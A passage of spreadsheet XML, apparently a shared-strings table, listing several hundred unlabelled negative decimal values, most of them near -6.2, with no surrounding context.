    <t>-6.15735</t>
  </si>
  <si>
    <t>-6.19343</t>
  </si>
  <si>
    <t>-6.15515</t>
  </si>
  <si>
    <t>-6.26857</t>
  </si>
  <si>
    <t>-6.16227</t>
  </si>
  <si>
    <t>-6.22536</t>
  </si>
  <si>
    <t>-6.14653</t>
  </si>
  <si>
    <t>-6.20644</t>
  </si>
  <si>
    <t>-6.13907</t>
  </si>
  <si>
    <t>-6.24044</t>
  </si>
  <si>
    <t>-6.12330</t>
  </si>
  <si>
    <t>-6.19150</t>
  </si>
  <si>
    <t>-6.15128</t>
  </si>
  <si>
    <t>-6.18027</t>
  </si>
  <si>
    <t>-6.26313</t>
  </si>
  <si>
    <t>-6.24776</t>
  </si>
  <si>
    <t>-6.24150</t>
  </si>
  <si>
    <t>-6.20446</t>
  </si>
  <si>
    <t>-6.17342</t>
  </si>
  <si>
    <t>-6.96145</t>
  </si>
  <si>
    <t>-6.27895</t>
  </si>
  <si>
    <t>-6.16915</t>
  </si>
  <si>
    <t>-6.16026</t>
  </si>
  <si>
    <t>-6.17437</t>
  </si>
  <si>
    <t>-6.11702</t>
  </si>
  <si>
    <t>-6.15516</t>
  </si>
  <si>
    <t>-6.16191</t>
  </si>
  <si>
    <t>-6.24316</t>
  </si>
  <si>
    <t>-6.14528</t>
  </si>
  <si>
    <t>-6.96656</t>
  </si>
  <si>
    <t>-6.20100</t>
  </si>
  <si>
    <t>-6.17215</t>
  </si>
  <si>
    <t>-6.18190</t>
  </si>
  <si>
    <t>-6.17380</t>
  </si>
  <si>
    <t>-7.26031</t>
  </si>
  <si>
    <t>-7.80082</t>
  </si>
  <si>
    <t>-7.60506</t>
  </si>
  <si>
    <t>-6.26096</t>
  </si>
  <si>
    <t>-7.33308</t>
  </si>
  <si>
    <t>-6.60945</t>
  </si>
  <si>
    <t>-7.30022</t>
  </si>
  <si>
    <t>-6.29467</t>
  </si>
  <si>
    <t>-7.56110</t>
  </si>
  <si>
    <t>-6.99139</t>
  </si>
  <si>
    <t>-6.24100</t>
  </si>
  <si>
    <t>-6.24105</t>
  </si>
  <si>
    <t>-6.11647</t>
  </si>
  <si>
    <t>-6.23902</t>
  </si>
  <si>
    <t>-6.09908</t>
  </si>
  <si>
    <t>-6.13037</t>
  </si>
  <si>
    <t>-6.16441</t>
  </si>
  <si>
    <t>-6.16326</t>
  </si>
  <si>
    <t>-6.09690</t>
  </si>
  <si>
    <t>-6.20737</t>
  </si>
  <si>
    <t>-6.24663</t>
  </si>
  <si>
    <t>-6.16400</t>
  </si>
  <si>
    <t>-6.15009</t>
  </si>
  <si>
    <t>-6.11302</t>
  </si>
  <si>
    <t>-6.11293</t>
  </si>
  <si>
    <t>-6.16351</t>
  </si>
  <si>
    <t>-6.20738</t>
  </si>
  <si>
    <t>-6.20731</t>
  </si>
  <si>
    <t>-6.11060</t>
  </si>
  <si>
    <t>-6.16780</t>
  </si>
  <si>
    <t>-6.15650</t>
  </si>
  <si>
    <t>-6.13334</t>
  </si>
  <si>
    <t>-6.30136</t>
  </si>
  <si>
    <t>-6.16742</t>
  </si>
  <si>
    <t>-6.20536</t>
  </si>
  <si>
    <t>-6.19817</t>
  </si>
  <si>
    <t>-6.13875</t>
  </si>
  <si>
    <t>-6.16999</t>
  </si>
  <si>
    <t>-6.30133</t>
  </si>
  <si>
    <t>-6.15258</t>
  </si>
  <si>
    <t>-6.18839</t>
  </si>
  <si>
    <t>-6.15033</t>
  </si>
  <si>
    <t>-6.14594</t>
  </si>
  <si>
    <t>-6.19593</t>
  </si>
  <si>
    <t>-6.18838</t>
  </si>
  <si>
    <t>-6.24123</t>
  </si>
  <si>
    <t>-6.17176</t>
  </si>
  <si>
    <t>-6.15842</t>
  </si>
  <si>
    <t>-6.10256</t>
  </si>
  <si>
    <t>-6.17859</t>
  </si>
  <si>
    <t>-6.17755</t>
  </si>
  <si>
    <t>-6.17949</t>
  </si>
  <si>
    <t>-6.16355</t>
  </si>
  <si>
    <t>-6.20151</t>
  </si>
  <si>
    <t>-6.24771</t>
  </si>
  <si>
    <t>-6.10769</t>
  </si>
  <si>
    <t>-6.15559</t>
  </si>
  <si>
    <t>-6.16196</t>
  </si>
  <si>
    <t>-6.18668</t>
  </si>
  <si>
    <t>-6.16505</t>
  </si>
  <si>
    <t>-6.16399</t>
  </si>
  <si>
    <t>-6.22329</t>
  </si>
  <si>
    <t>-6.19178</t>
  </si>
  <si>
    <t>-6.33230</t>
  </si>
  <si>
    <t>-6.16426</t>
  </si>
  <si>
    <t>-6.18832</t>
  </si>
  <si>
    <t>-6.23912</t>
  </si>
  <si>
    <t>-6.32805</t>
  </si>
  <si>
    <t>-6.27127</t>
  </si>
  <si>
    <t>-6.14576</t>
  </si>
  <si>
    <t>-6.24559</t>
  </si>
  <si>
    <t>-6.22532</t>
  </si>
  <si>
    <t>-6.16536</t>
  </si>
  <si>
    <t>-6.22305</t>
  </si>
  <si>
    <t>-6.15220</t>
  </si>
  <si>
    <t>-6.23764</t>
  </si>
  <si>
    <t>-6.23280</t>
  </si>
  <si>
    <t>-6.18401</t>
  </si>
  <si>
    <t>-6.15480</t>
  </si>
  <si>
    <t>-6.14934</t>
  </si>
  <si>
    <t>-6.17200</t>
  </si>
  <si>
    <t>-6.31856</t>
  </si>
  <si>
    <t>-6.21175</t>
  </si>
  <si>
    <t>-6.19942</t>
  </si>
  <si>
    <t>-6.12795</t>
  </si>
  <si>
    <t>-6.19275</t>
  </si>
  <si>
    <t>-6.22072</t>
  </si>
  <si>
    <t>-6.15235</t>
  </si>
  <si>
    <t>-6.19988</t>
  </si>
  <si>
    <t>-6.15884</t>
  </si>
  <si>
    <t>-6.19316</t>
  </si>
  <si>
    <t>-6.17122</t>
  </si>
  <si>
    <t>-6.12797</t>
  </si>
  <si>
    <t>-6.28585</t>
  </si>
  <si>
    <t>-6.31847</t>
  </si>
  <si>
    <t>-6.22111</t>
  </si>
  <si>
    <t>-6.24112</t>
  </si>
  <si>
    <t>-6.29507</t>
  </si>
  <si>
    <t>-6.26258</t>
  </si>
  <si>
    <t>-6.19856</t>
  </si>
  <si>
    <t>-6.10246</t>
  </si>
  <si>
    <t>-6.20221</t>
  </si>
  <si>
    <t>-6.20878</t>
  </si>
  <si>
    <t>-6.17004</t>
  </si>
  <si>
    <t>-6.22081</t>
  </si>
  <si>
    <t>-6.14909</t>
  </si>
  <si>
    <t>-6.94315</t>
  </si>
  <si>
    <t>-6.97261</t>
  </si>
  <si>
    <t>-6.96509</t>
  </si>
  <si>
    <t>-6.15252</t>
  </si>
  <si>
    <t>-6.20145</t>
  </si>
  <si>
    <t>-6.59151</t>
  </si>
  <si>
    <t>-6.18004</t>
  </si>
  <si>
    <t>-6.26569</t>
  </si>
  <si>
    <t>-6.80686</t>
  </si>
  <si>
    <t>-6.97380</t>
  </si>
  <si>
    <t>-6.96234</t>
  </si>
  <si>
    <t>-6.97446</t>
  </si>
  <si>
    <t>-6.97507</t>
  </si>
  <si>
    <t>-6.19986</t>
  </si>
  <si>
    <t>-6.16958</t>
  </si>
  <si>
    <t>-3.32407</t>
  </si>
  <si>
    <t>-7.27964</t>
  </si>
  <si>
    <t>-6.19989</t>
  </si>
  <si>
    <t>-6.17763</t>
  </si>
  <si>
    <t>-6.20659</t>
  </si>
  <si>
    <t>-6.16187</t>
  </si>
  <si>
    <t>-6.17933</t>
  </si>
  <si>
    <t>-6.13997</t>
  </si>
  <si>
    <t>-6.15264</t>
  </si>
  <si>
    <t>-6.14710</t>
  </si>
  <si>
    <t>-6.15255</t>
  </si>
  <si>
    <t>-6.17079</t>
  </si>
  <si>
    <t>-6.19926</t>
  </si>
  <si>
    <t>-6.20146</t>
  </si>
  <si>
    <t>-6.19790</t>
  </si>
  <si>
    <t>-6.17567</t>
  </si>
  <si>
    <t>-6.25704</t>
  </si>
  <si>
    <t>-6.19795</t>
  </si>
  <si>
    <t>-6.18585</t>
  </si>
  <si>
    <t>-6.19855</t>
  </si>
  <si>
    <t>-6.17812</t>
  </si>
  <si>
    <t>-6.21936</t>
  </si>
  <si>
    <t>-6.22823</t>
  </si>
  <si>
    <t>-6.17847</t>
  </si>
  <si>
    <t>-6.20003</t>
  </si>
  <si>
    <t>-6.24440</t>
  </si>
  <si>
    <t>-6.21027</t>
  </si>
  <si>
    <t>-6.21944</t>
  </si>
  <si>
    <t>-6.21868</t>
  </si>
  <si>
    <t>-6.19834</t>
  </si>
  <si>
    <t>-6.19236</t>
  </si>
  <si>
    <t>-6.17442</t>
  </si>
  <si>
    <t>-6.21947</t>
  </si>
  <si>
    <t>-6.22491</t>
  </si>
  <si>
    <t>-6.17832</t>
  </si>
  <si>
    <t>-6.18565</t>
  </si>
  <si>
    <t>-6.18679</t>
  </si>
  <si>
    <t>-6.23370</t>
  </si>
  <si>
    <t>-6.23377</t>
  </si>
  <si>
    <t>-6.20666</t>
  </si>
  <si>
    <t>-6.17989</t>
  </si>
  <si>
    <t>-6.19897</t>
  </si>
  <si>
    <t>-6.19173</t>
  </si>
  <si>
    <t>-6.17634</t>
  </si>
  <si>
    <t>-6.16442</t>
  </si>
  <si>
    <t>-6.21458</t>
  </si>
  <si>
    <t>-6.21759</t>
  </si>
  <si>
    <t>-6.22705</t>
  </si>
  <si>
    <t>-6.16673</t>
  </si>
  <si>
    <t>-6.23417</t>
  </si>
  <si>
    <t>-6.23378</t>
  </si>
  <si>
    <t>-6.19982</t>
  </si>
  <si>
    <t>-6.19901</t>
  </si>
  <si>
    <t>-6.17914</t>
  </si>
  <si>
    <t>-6.18182</t>
  </si>
  <si>
    <t>-6.16762</t>
  </si>
  <si>
    <t>-6.21315</t>
  </si>
  <si>
    <t>-6.18540</t>
  </si>
  <si>
    <t>-6.14979</t>
  </si>
  <si>
    <t>-6.16776</t>
  </si>
  <si>
    <t>-6.20902</t>
  </si>
  <si>
    <t>-6.24037</t>
  </si>
  <si>
    <t>-6.18071</t>
  </si>
  <si>
    <t>-6.21171</t>
  </si>
  <si>
    <t>-6.21831</t>
  </si>
  <si>
    <t>-6.20503</t>
  </si>
  <si>
    <t>-6.20826</t>
  </si>
  <si>
    <t>-6.19876</t>
  </si>
  <si>
    <t>-6.19791</t>
  </si>
  <si>
    <t>-6.20764</t>
  </si>
  <si>
    <t>-6.20433</t>
  </si>
  <si>
    <t>-6.17532</t>
  </si>
  <si>
    <t>-6.21728</t>
  </si>
  <si>
    <t>-6.18555</t>
  </si>
  <si>
    <t>-6.21812</t>
  </si>
  <si>
    <t>-6.20518</t>
  </si>
  <si>
    <t>-6.20907</t>
  </si>
  <si>
    <t>-6.19948</t>
  </si>
  <si>
    <t>-6.18865</t>
  </si>
  <si>
    <t>-6.17284</t>
  </si>
  <si>
    <t>-6.29085</t>
  </si>
  <si>
    <t>-6.21444</t>
  </si>
  <si>
    <t>-6.19745</t>
  </si>
  <si>
    <t>-6.17509</t>
  </si>
  <si>
    <t>-6.25166</t>
  </si>
  <si>
    <t>-6.17523</t>
  </si>
  <si>
    <t>-6.18028</t>
  </si>
  <si>
    <t>-6.17610</t>
  </si>
  <si>
    <t>-6.25381</t>
  </si>
  <si>
    <t>-6.18169</t>
  </si>
  <si>
    <t>-6.23490</t>
  </si>
  <si>
    <t>-6.24613</t>
  </si>
  <si>
    <t>-6.15259</t>
  </si>
  <si>
    <t>-6.17957</t>
  </si>
  <si>
    <t>-6.19462</t>
  </si>
  <si>
    <t>-6.17631</t>
  </si>
  <si>
    <t>-6.16864</t>
  </si>
  <si>
    <t>-6.17808</t>
  </si>
  <si>
    <t>-6.18093</t>
  </si>
  <si>
    <t>-6.32333</t>
  </si>
  <si>
    <t>-6.16078</t>
  </si>
  <si>
    <t>-6.22720</t>
  </si>
  <si>
    <t>-6.20740</t>
  </si>
  <si>
    <t>-6.20050</t>
  </si>
  <si>
    <t>-6.18703</t>
  </si>
  <si>
    <t>-6.19689</t>
  </si>
  <si>
    <t>-6.18051</t>
  </si>
  <si>
    <t>-6.20049</t>
  </si>
  <si>
    <t>-6.26618</t>
  </si>
  <si>
    <t>-6.17536</t>
  </si>
  <si>
    <t>-6.16138</t>
  </si>
  <si>
    <t>-6.21807</t>
  </si>
  <si>
    <t>-6.20721</t>
  </si>
  <si>
    <t>-6.15813</t>
  </si>
  <si>
    <t>-6.18883</t>
  </si>
  <si>
    <t>-6.23495</t>
  </si>
  <si>
    <t>-6.18017</t>
  </si>
  <si>
    <t>-6.18043</t>
  </si>
  <si>
    <t>-6.17980</t>
  </si>
  <si>
    <t>-6.19589</t>
  </si>
  <si>
    <t>-6.18358</t>
  </si>
  <si>
    <t>-6.18243</t>
  </si>
  <si>
    <t>-6.15139</t>
  </si>
  <si>
    <t>-6.16222</t>
  </si>
  <si>
    <t>-6.19956</t>
  </si>
  <si>
    <t>-6.22647</t>
  </si>
  <si>
    <t>-6.17341</t>
  </si>
  <si>
    <t>-6.15342</t>
  </si>
  <si>
    <t>-6.16332</t>
  </si>
  <si>
    <t>-6.23363</t>
  </si>
  <si>
    <t>-6.17900</t>
  </si>
  <si>
    <t>-6.21666</t>
  </si>
  <si>
    <t>-6.19146</t>
  </si>
  <si>
    <t>-6.17324</t>
  </si>
  <si>
    <t>-6.22157</t>
  </si>
  <si>
    <t>-6.18119</t>
  </si>
  <si>
    <t>-6.13658</t>
  </si>
  <si>
    <t>-6.14400</t>
  </si>
  <si>
    <t>-6.17836</t>
  </si>
  <si>
    <t>-6.18077</t>
  </si>
  <si>
    <t>-6.17082</t>
  </si>
  <si>
    <t>-6.20206</t>
  </si>
  <si>
    <t>-6.17507</t>
  </si>
  <si>
    <t>-6.22011</t>
  </si>
  <si>
    <t>-6.21707</t>
  </si>
  <si>
    <t>-6.17362</t>
  </si>
  <si>
    <t>-6.19195</t>
  </si>
  <si>
    <t>-6.17349</t>
  </si>
  <si>
    <t>-6.19291</t>
  </si>
  <si>
    <t>-6.19452</t>
  </si>
  <si>
    <t>-6.19995</t>
  </si>
  <si>
    <t>-6.26935</t>
  </si>
  <si>
    <t>-6.20483</t>
  </si>
  <si>
    <t>-6.22917</t>
  </si>
  <si>
    <t>-6.17875</t>
  </si>
  <si>
    <t>-6.15672</t>
  </si>
  <si>
    <t>-6.18856</t>
  </si>
  <si>
    <t>-6.14589</t>
  </si>
  <si>
    <t>-6.16019</t>
  </si>
  <si>
    <t>-6.19491</t>
  </si>
  <si>
    <t>-6.18213</t>
  </si>
  <si>
    <t>-6.18607</t>
  </si>
  <si>
    <t>-6.19077</t>
  </si>
  <si>
    <t>-6.19952</t>
  </si>
  <si>
    <t>-6.14307</t>
  </si>
  <si>
    <t>-6.16706</t>
  </si>
  <si>
    <t>-6.13870</t>
  </si>
  <si>
    <t>-6.14253</t>
  </si>
  <si>
    <t>-6.17558</t>
  </si>
  <si>
    <t>-6.15978</t>
  </si>
  <si>
    <t>-6.19148</t>
  </si>
  <si>
    <t>-6.15690</t>
  </si>
  <si>
    <t>-6.21680</t>
  </si>
  <si>
    <t>-6.19818</t>
  </si>
  <si>
    <t>-6.18635</t>
  </si>
  <si>
    <t>-6.22741</t>
  </si>
  <si>
    <t>-6.19759</t>
  </si>
  <si>
    <t>-6.15270</t>
  </si>
  <si>
    <t>-6.16993</t>
  </si>
  <si>
    <t>-6.17823</t>
  </si>
  <si>
    <t>-6.23532</t>
  </si>
  <si>
    <t>-6.15844</t>
  </si>
  <si>
    <t>-6.19744</t>
  </si>
  <si>
    <t>-6.16961</t>
  </si>
  <si>
    <t>-6.18536</t>
  </si>
  <si>
    <t>-6.19724</t>
  </si>
  <si>
    <t>-6.15700</t>
  </si>
  <si>
    <t>-6.17744</t>
  </si>
  <si>
    <t>-6.18253</t>
  </si>
  <si>
    <t>-6.26023</t>
  </si>
  <si>
    <t>-6.26479</t>
  </si>
  <si>
    <t>-6.27651</t>
  </si>
  <si>
    <t>-6.17305</t>
  </si>
  <si>
    <t>-6.14832</t>
  </si>
  <si>
    <t>-6.26428</t>
  </si>
  <si>
    <t>-6.16296</t>
  </si>
  <si>
    <t>-6.18237</t>
  </si>
  <si>
    <t>-6.16876</t>
  </si>
  <si>
    <t>-6.17951</t>
  </si>
  <si>
    <t>-6.16927</t>
  </si>
  <si>
    <t>-6.19843</t>
  </si>
  <si>
    <t>-6.17698</t>
  </si>
  <si>
    <t>-6.19453</t>
  </si>
  <si>
    <t>-6.15657</t>
  </si>
  <si>
    <t>-6.16982</t>
  </si>
  <si>
    <t>-6.20699</t>
  </si>
  <si>
    <t>-6.29354</t>
  </si>
  <si>
    <t>-6.13110</t>
  </si>
  <si>
    <t>-6.17640</t>
  </si>
  <si>
    <t>-6.16660</t>
  </si>
  <si>
    <t>-6.26346</t>
  </si>
  <si>
    <t>-6.15967</t>
  </si>
  <si>
    <t>-6.22977</t>
  </si>
  <si>
    <t>-6.26741</t>
  </si>
  <si>
    <t>-6.14702</t>
  </si>
  <si>
    <t>-6.20421</t>
  </si>
  <si>
    <t>-6.16028</t>
  </si>
  <si>
    <t>-6.15509</t>
  </si>
  <si>
    <t>-6.15493</t>
  </si>
  <si>
    <t>-6.20912</t>
  </si>
  <si>
    <t>-6.19289</t>
  </si>
  <si>
    <t>-6.16361</t>
  </si>
  <si>
    <t>-6.14178</t>
  </si>
  <si>
    <t>-6.12073</t>
  </si>
  <si>
    <t>-6.27565</t>
  </si>
  <si>
    <t>-6.16881</t>
  </si>
  <si>
    <t>-6.15274</t>
  </si>
  <si>
    <t>-6.18087</t>
  </si>
  <si>
    <t>-6.24751</t>
  </si>
  <si>
    <t>-6.16201</t>
  </si>
  <si>
    <t>-6.16852</t>
  </si>
  <si>
    <t>-6.22982</t>
  </si>
  <si>
    <t>-6.17465</t>
  </si>
  <si>
    <t>-6.15747</t>
  </si>
  <si>
    <t>-6.18184</t>
  </si>
  <si>
    <t>-6.13930</t>
  </si>
  <si>
    <t>-6.15174</t>
  </si>
  <si>
    <t>-6.17094</t>
  </si>
  <si>
    <t>-6.16887</t>
  </si>
  <si>
    <t>-6.17320</t>
  </si>
  <si>
    <t>-6.21043</t>
  </si>
  <si>
    <t>-6.14521</t>
  </si>
  <si>
    <t>-6.19973</t>
  </si>
  <si>
    <t>-6.15788</t>
  </si>
  <si>
    <t>-6.16095</t>
  </si>
  <si>
    <t>-6.11348</t>
  </si>
  <si>
    <t>-6.17444</t>
  </si>
  <si>
    <t>-6.13296</t>
  </si>
  <si>
    <t>-6.16624</t>
  </si>
  <si>
    <t>-6.13261</t>
  </si>
  <si>
    <t>-6.14895</t>
  </si>
  <si>
    <t>-6.15929</t>
  </si>
  <si>
    <t>-6.17680</t>
  </si>
  <si>
    <t>-6.10664</t>
  </si>
  <si>
    <t>-6.10760</t>
  </si>
  <si>
    <t>-6.13160</t>
  </si>
  <si>
    <t>-6.17636</t>
  </si>
  <si>
    <t>-6.17283</t>
  </si>
  <si>
    <t>-6.14950</t>
  </si>
  <si>
    <t>-6.10915</t>
  </si>
  <si>
    <t>-6.16968</t>
  </si>
  <si>
    <t>-6.12762</t>
  </si>
  <si>
    <t>-6.30452</t>
  </si>
  <si>
    <t>-6.24769</t>
  </si>
  <si>
    <t>-6.30056</t>
  </si>
  <si>
    <t>-6.15689</t>
  </si>
  <si>
    <t>-6.77948</t>
  </si>
  <si>
    <t>-6.12227</t>
  </si>
  <si>
    <t>-6.13801</t>
  </si>
  <si>
    <t>-6.78125</t>
  </si>
  <si>
    <t>-6.32171</t>
  </si>
  <si>
    <t>-6.77892</t>
  </si>
  <si>
    <t>-6.25261</t>
  </si>
  <si>
    <t>-6.25156</t>
  </si>
  <si>
    <t>-6.25153</t>
  </si>
  <si>
    <t>-6.25170</t>
  </si>
  <si>
    <t>-6.21294</t>
  </si>
  <si>
    <t>-6.16521</t>
  </si>
  <si>
    <t>-6.21456</t>
  </si>
  <si>
    <t>-6.21663</t>
  </si>
  <si>
    <t>-6.21610</t>
  </si>
  <si>
    <t>-6.12794</t>
  </si>
  <si>
    <t>-6.29529</t>
  </si>
  <si>
    <t>-6.28413</t>
  </si>
  <si>
    <t>-6.16716</t>
  </si>
  <si>
    <t>-6.28132</t>
  </si>
  <si>
    <t>-6.19981</t>
  </si>
  <si>
    <t>-6.18068</t>
  </si>
  <si>
    <t>-6.26183</t>
  </si>
  <si>
    <t>-6.23487</t>
  </si>
  <si>
    <t>-6.21697</t>
  </si>
  <si>
    <t>-6.29488</t>
  </si>
  <si>
    <t>-6.22556</t>
  </si>
  <si>
    <t>-6.26612</t>
  </si>
  <si>
    <t>-6.30072</t>
  </si>
  <si>
    <t>-6.17608</t>
  </si>
  <si>
    <t>-6.16851</t>
  </si>
  <si>
    <t>-6.23338</t>
  </si>
  <si>
    <t>-6.21820</t>
  </si>
  <si>
    <t>-6.18457</t>
  </si>
  <si>
    <t>-6.26687</t>
  </si>
  <si>
    <t>-6.24876</t>
  </si>
  <si>
    <t>-6.27135</t>
  </si>
  <si>
    <t>-6.32692</t>
  </si>
  <si>
    <t>-6.18109</t>
  </si>
  <si>
    <t>-6.20223</t>
  </si>
  <si>
    <t>-6.18222</t>
  </si>
  <si>
    <t>-6.20857</t>
  </si>
  <si>
    <t>-6.23057</t>
  </si>
  <si>
    <t>-6.17978</t>
  </si>
  <si>
    <t>-6.17912</t>
  </si>
  <si>
    <t>-6.22039</t>
  </si>
  <si>
    <t>-6.22595</t>
  </si>
  <si>
    <t>-6.27747</t>
  </si>
  <si>
    <t>-6.21324</t>
  </si>
  <si>
    <t>-6.29077</t>
  </si>
  <si>
    <t>-6.28719</t>
  </si>
  <si>
    <t>-6.26568</t>
  </si>
  <si>
    <t>-6.22376</t>
  </si>
  <si>
    <t>-6.27399</t>
  </si>
  <si>
    <t>-6.17985</t>
  </si>
  <si>
    <t>-6.23888</t>
  </si>
  <si>
    <t>-6.28248</t>
  </si>
  <si>
    <t>-6.26750</t>
  </si>
  <si>
    <t>-6.21537</t>
  </si>
  <si>
    <t>-6.29337</t>
  </si>
  <si>
    <t>-6.14575</t>
  </si>
  <si>
    <t>-6.17932</t>
  </si>
  <si>
    <t>-6.24746</t>
  </si>
  <si>
    <t>-6.17706</t>
  </si>
  <si>
    <t>-6.27358</t>
  </si>
  <si>
    <t>-6.27018</t>
  </si>
  <si>
    <t>-6.20915</t>
  </si>
  <si>
    <t>-6.30051</t>
  </si>
  <si>
    <t>-6.27969</t>
  </si>
  <si>
    <t>-6.14677</t>
  </si>
  <si>
    <t>-6.21736</t>
  </si>
  <si>
    <t>-6.28662</t>
  </si>
  <si>
    <t>-6.30319</t>
  </si>
  <si>
    <t>-6.34391</t>
  </si>
  <si>
    <t>-6.24309</t>
  </si>
  <si>
    <t>-6.26287</t>
  </si>
  <si>
    <t>-6.31743</t>
  </si>
  <si>
    <t>-6.19717</t>
  </si>
  <si>
    <t>-6.20593</t>
  </si>
  <si>
    <t>-6.24881</t>
  </si>
  <si>
    <t>-6.17471</t>
  </si>
  <si>
    <t>-6.24867</t>
  </si>
  <si>
    <t>-6.16181</t>
  </si>
  <si>
    <t>-6.26296</t>
  </si>
  <si>
    <t>-6.17279</t>
  </si>
  <si>
    <t>-6.16761</t>
  </si>
  <si>
    <t>-6.16862</t>
  </si>
  <si>
    <t>-6.25688</t>
  </si>
  <si>
    <t>-6.16684</t>
  </si>
  <si>
    <t>-6.24000</t>
  </si>
  <si>
    <t>-6.16551</t>
  </si>
  <si>
    <t>-6.16996</t>
  </si>
  <si>
    <t>-6.31944</t>
  </si>
  <si>
    <t>-6.29339</t>
  </si>
  <si>
    <t>-6.16036</t>
  </si>
  <si>
    <t>-6.17521</t>
  </si>
  <si>
    <t>-6.26909</t>
  </si>
  <si>
    <t>-6.16783</t>
  </si>
  <si>
    <t>-6.15267</t>
  </si>
  <si>
    <t>-6.23541</t>
  </si>
  <si>
    <t>-6.15076</t>
  </si>
  <si>
    <t>-6.19433</t>
  </si>
  <si>
    <t>-6.21880</t>
  </si>
  <si>
    <t>-6.23815</t>
  </si>
  <si>
    <t>-6.14151</t>
  </si>
  <si>
    <t>-6.26351</t>
  </si>
  <si>
    <t>-6.16586</t>
  </si>
  <si>
    <t>-6.14538</t>
  </si>
  <si>
    <t>-6.18121</t>
  </si>
  <si>
    <t>-6.24201</t>
  </si>
  <si>
    <t>-6.15569</t>
  </si>
  <si>
    <t>-6.16632</t>
  </si>
  <si>
    <t>-6.18500</t>
  </si>
  <si>
    <t>-6.15644</t>
  </si>
  <si>
    <t>-6.22104</t>
  </si>
  <si>
    <t>-6.22087</t>
  </si>
  <si>
    <t>-6.21051</t>
  </si>
  <si>
    <t>-6.25987</t>
  </si>
  <si>
    <t>-6.17539</t>
  </si>
  <si>
    <t>-6.14859</t>
  </si>
  <si>
    <t>-6.20225</t>
  </si>
  <si>
    <t>-6.21149</t>
  </si>
  <si>
    <t>-6.23348</t>
  </si>
  <si>
    <t>-6.33256</t>
  </si>
  <si>
    <t>-6.26340</t>
  </si>
  <si>
    <t>-6.23854</t>
  </si>
  <si>
    <t>-6.28001</t>
  </si>
  <si>
    <t>-6.16226</t>
  </si>
  <si>
    <t>-6.23070</t>
  </si>
  <si>
    <t>-6.29376</t>
  </si>
  <si>
    <t>-6.18560</t>
  </si>
  <si>
    <t>-6.26198</t>
  </si>
  <si>
    <t>-6.23389</t>
  </si>
  <si>
    <t>-6.15767</t>
  </si>
  <si>
    <t>-6.13473</t>
  </si>
  <si>
    <t>-6.17922</t>
  </si>
  <si>
    <t>-6.22981</t>
  </si>
  <si>
    <t>-6.24373</t>
  </si>
  <si>
    <t>-6.15185</t>
  </si>
  <si>
    <t>-7.07023</t>
  </si>
  <si>
    <t>-6.24233</t>
  </si>
  <si>
    <t>-6.21631</t>
  </si>
  <si>
    <t>-6.24328</t>
  </si>
  <si>
    <t>-6.18936</t>
  </si>
  <si>
    <t>-6.19090</t>
  </si>
  <si>
    <t>-6.17858</t>
  </si>
  <si>
    <t>-6.14543</t>
  </si>
  <si>
    <t>-6.20038</t>
  </si>
  <si>
    <t>-6.18674</t>
  </si>
  <si>
    <t>-6.25191</t>
  </si>
  <si>
    <t>-6.17083</t>
  </si>
  <si>
    <t>-6.30027</t>
  </si>
  <si>
    <t>-6.29111</t>
  </si>
  <si>
    <t>-6.17217</t>
  </si>
  <si>
    <t>-6.16035</t>
  </si>
  <si>
    <t>-6.17519</t>
  </si>
  <si>
    <t>-6.25611</t>
  </si>
  <si>
    <t>-6.23893</t>
  </si>
  <si>
    <t>-6.25124</t>
  </si>
  <si>
    <t>-6.26030</t>
  </si>
  <si>
    <t>-6.28084</t>
  </si>
  <si>
    <t>-6.20227</t>
  </si>
  <si>
    <t>-6.25829</t>
  </si>
  <si>
    <t>-6.20458</t>
  </si>
  <si>
    <t>-6.21901</t>
  </si>
  <si>
    <t>-6.21299</t>
  </si>
  <si>
    <t>-6.18767</t>
  </si>
  <si>
    <t>-6.16556</t>
  </si>
  <si>
    <t>-6.16729</t>
  </si>
  <si>
    <t>-6.24580</t>
  </si>
  <si>
    <t>-6.22058</t>
  </si>
  <si>
    <t>-6.17811</t>
  </si>
  <si>
    <t>-6.16906</t>
  </si>
  <si>
    <t>-6.15534</t>
  </si>
  <si>
    <t>-6.19947</t>
  </si>
  <si>
    <t>-6.18065</t>
  </si>
  <si>
    <t>-6.18260</t>
  </si>
  <si>
    <t>-6.20160</t>
  </si>
  <si>
    <t>-6.32264</t>
  </si>
  <si>
    <t>-6.19549</t>
  </si>
  <si>
    <t>-6.27071</t>
  </si>
  <si>
    <t>-6.18038</t>
  </si>
  <si>
    <t>-6.28047</t>
  </si>
  <si>
    <t>-6.23122</t>
  </si>
  <si>
    <t>-6.30329</t>
  </si>
  <si>
    <t>-6.16129</t>
  </si>
  <si>
    <t>-6.14848</t>
  </si>
  <si>
    <t>-6.22713</t>
  </si>
  <si>
    <t>-6.15812</t>
  </si>
  <si>
    <t>-6.16895</t>
  </si>
  <si>
    <t>-6.20352</t>
  </si>
  <si>
    <t>-6.19035</t>
  </si>
  <si>
    <t>-6.25230</t>
  </si>
  <si>
    <t>-6.17265</t>
  </si>
  <si>
    <t>-6.15478</t>
  </si>
  <si>
    <t>-6.19218</t>
  </si>
  <si>
    <t>-6.24966</t>
  </si>
  <si>
    <t>-6.25878</t>
  </si>
  <si>
    <t>-6.14886</t>
  </si>
  <si>
    <t>-6.27775</t>
  </si>
  <si>
    <t>-6.20650</t>
  </si>
  <si>
    <t>-6.18892</t>
  </si>
  <si>
    <t>-6.21296</t>
  </si>
  <si>
    <t>-6.23668</t>
  </si>
  <si>
    <t>-6.31721</t>
  </si>
  <si>
    <t>-6.14230</t>
  </si>
  <si>
    <t>-6.16001</t>
  </si>
  <si>
    <t>-6.27860</t>
  </si>
  <si>
    <t>-6.24870</t>
  </si>
  <si>
    <t>-6.26193</t>
  </si>
  <si>
    <t>-6.22871</t>
  </si>
  <si>
    <t>-6.15939</t>
  </si>
  <si>
    <t>-6.14786</t>
  </si>
  <si>
    <t>-6.15555</t>
  </si>
  <si>
    <t>-6.24168</t>
  </si>
  <si>
    <t>-6.15745</t>
  </si>
  <si>
    <t>-6.20126</t>
  </si>
  <si>
    <t>-6.23451</t>
  </si>
  <si>
    <t>-6.25298</t>
  </si>
  <si>
    <t>-6.19328</t>
  </si>
  <si>
    <t>-6.15909</t>
  </si>
  <si>
    <t>-6.26356</t>
  </si>
  <si>
    <t>-6.25637</t>
  </si>
  <si>
    <t>-6.20545</t>
  </si>
  <si>
    <t>-6.26245</t>
  </si>
  <si>
    <t>-6.11470</t>
  </si>
  <si>
    <t>-6.15469</t>
  </si>
  <si>
    <t>-6.28902</t>
  </si>
  <si>
    <t>-6.22699</t>
  </si>
  <si>
    <t>-6.16315</t>
  </si>
  <si>
    <t>-6.18734</t>
  </si>
  <si>
